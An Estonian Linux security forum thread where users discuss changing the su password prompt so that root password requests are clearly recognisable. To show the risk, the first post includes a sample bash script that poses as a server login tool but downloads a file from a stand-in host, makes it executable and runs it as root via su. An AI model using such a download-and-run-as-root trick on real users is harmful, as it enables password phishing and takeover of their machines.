Portaal Portaal Pingviini veeb foorumi pealeht
  Viki  |  IRC  |  Otsing  |  Küsimused ja vastused  |  Profiil  |  Privaatsõnumite vaatamiseks logi sisse  | Logi sisse või Registreeru
<empty>

su salasõna prompt
 Vaata järgmist teemat
Vaata eelmist teemat
Postita uus teemaVasta teemale Pingviini veeb foorumi pealeht » Linux » Linux ja turvalisus » su salasõna prompt
Autor Sõnum
sips
 Pingviini aktivist
Pingviini aktivist



Liitunud: 20.05.2006
Postitused: 288

Distributsioon: Arch
 estonia.gif
postituspostitatud: 02.09.2011, 21:02  postituse pealkiri:  su salasõna prompt  
Kas ja kuidas oleks võmalik muuta nn su salasõna pärimise prompti?

Hetkel Archlinux küsib su käsu peale lihtsalt
Password:

Aga kui nt netist tõmmata skript, mis kirjelduse järgi loob ühenduse mingi serveriga, kuid tehelikult on skripti sisuks
Kood: < Vali > < Laienda >
#!/bin/bash

echo "Server: "
read server

echo "Login name: "
read user

wget –output-document /tmp/pahalane http://example.com/VägaPahalane > /dev/null 2>&1
chmod +x /tmp/pahalane
su -c /tmp/pahalane

Parem oleks kui su käsu peale küsitakse nt
Enter your local root password:

_________________
PS! Vanaisale ei saa Linuxit peale lasta.
Valdur55
 Vana Pingviin
Vana Pingviin


Vanus: 30
Liitunud: 02.06.2007
Postitused: 640
Asukoht: Tartu
Distributsioon: *buntu
 estonia.gif
postituspostitatud: 02.09.2011, 21:10  postituse pealkiri:  (teema puudub)  
Enamasti on käivitatavate rakenduste otseteed kasutas /usr/bin (tavakasutaja) või /usr/sbin (root).
Edasi mõtled ise.


sips
 Pingviini aktivist
Pingviini aktivist



Liitunud: 20.05.2006
Postitused: 288

Distributsioon: Arch
 estonia.gif
postituspostitatud: 02.09.2011, 21:17  postituse pealkiri:  (teema puudub)  
Mis vahet seal on, kui käivitatav fail ise on kõigile kättesaadavas kohas?

_________________
PS! Vanaisale ei saa Linuxit peale lasta.
tramm
 Vana Pingviin
Vana Pingviin



Liitunud: 03.11.2008
Postitused: 900

Distributsioon: *buntu
 blank.gif
postituspostitatud: 02.09.2011, 21:35  postituse pealkiri:  Re: su salasõna prompt  
sips kirjutas: < Vali >
Kas ja kuidas oleks võmalik muuta nn su salasõna pärimise prompti?

Lokaliseerid po failiga? Kompileerid ise ja muudad stringi ära?

sips kirjutas: < Vali >
su -c /tmp/pahalane

Ah, et mängitakse sellele kaardile, et sul on igas serveris sama parool... Päris õpetlik.


sips
 Pingviini aktivist
Pingviini aktivist



Liitunud: 20.05.2006
Postitused: 288

Distributsioon: Arch
 estonia.gif
postituspostitatud: 02.09.2011, 21:53  postituse pealkiri:  Re: su salasõna prompt  
tramm kirjutas: < Vali >
Ah, et mängitakse sellele kaardile, et sul on igas serveris sama parool... Päris õpetlik.

Smile tundub, et pikk tööpäev on ajud sassi keeranud - loogika lonkab. Tegelt tahtsin oma arust kirjutada mingi näite, kus küsitakse parooli ja tehakse hoopis midagi muud.

Aga see .po failidega jändamine ja kompileerimine pole päris see.
Lihtsalt mure tekkis sellest, et nii sudo, kui ka su küsivad mõlemad lihtsalt
Password:
katsu siis aru saada mida sult tahetakse.

OK sudo'ga on lihtne:$ SUDO_PROMPT="sudo tahab kasutaja %u salasõna: " sudo ls
Lootsin, et su puhul on ka mingi sarnane lihtne "trikk"

_________________
PS! Vanaisale ei saa Linuxit peale lasta.
tramm
 Vana Pingviin
Vana Pingviin



Liitunud: 03.11.2008
Postitused: 900

Distributsioon: *buntu
 blank.gif
postituspostitatud: 02.09.2011, 22:08  postituse pealkiri:  Re: su salasõna prompt  
sips kirjutas: < Vali >
OK sudo'ga on lihtne:$ SUDO_PROMPT="sudo tahab kasutaja %u salasõna: " sudo ls
Lootsin, et su puhul on ka mingi sarnane lihtne "trikk"

Arusaadav. Aga pahalasel pole keeruline ka vajadusel SUDO_PROMPT muutujat sättida.


sips
 Pingviini aktivist
Pingviini aktivist



Liitunud: 20.05.2006
Postitused: 288

Distributsioon: Arch
 estonia.gif
postituspostitatud: 02.09.2011, 22:29  postituse pealkiri:  (teema puudub)  
Seda muidugi.
Soov oli, et ausad skriptid väljendaks selgemini millist salasõna nad tahavad.

Archlinuxil nt on selleine programm nagu yaourt, mis oskab kasutada nii su'd, kui ka sudo'd -
kui sudo parool nö aegub (ei sisestata, kuna kedagi pole masina juures) või pole sudo üldse installitud,
kasutatakse su'd, kuid mõlemal juhul on ekraanil lihtsalt
Password:

Jama on rohkem selles, et markeerida ei tahaks mitte tavakasutaja parooli küsimist,
vaid et root'u parooli pärimine oleks selgelt näha.

_________________
PS! Vanaisale ei saa Linuxit peale lasta.
tris

 Troll - ära toida!
Troll - ära toida!



Liitunud: 23.08.2014
Postitused: 713

Distributsioon: Debian
estonia.gif
postituspostitatud: 23.02.2016, 11:45  postituse pealkiri:  (teema puudub)  
1. sudoers määrata, mida sul admin.konto võimaldab:
yourusername ALL= NOPASSWD: /programmi_täpne_asukoht
2. mingi programmi luua:

Kood: < Vali > < Laienda >

#!/bin/bash
ENTRY=`zenity --password`
case $? in
0)
pw=$(echo $ENTRY | cut -d'|' -f1)
;;
1)
echo "Stop login.";;
-1)
echo "An unexpected error has occurred.";;
esac
TMP=$(echo "${pw}" | sudo -Sv)
TMP=0

Võibolla midagi siin mudida?



Ja su kohta - ma muutsin /bin/su õigus endal ainult juur saab käivitada ja grupp. Ning käivitan seda ainult: sudo su

_________________
ricochet:yckka6zlbxv767lz
Näita (aja järgi):      
Postita uus teemaVasta teemale Pingviini veeb foorumi pealeht » Linux » Linux ja turvalisus » su salasõna prompt





Vaata järgmist teemat
Vaata eelmist teemat

Powered by phpBB2 Plus based on phpBB © 2001/7 phpBB Group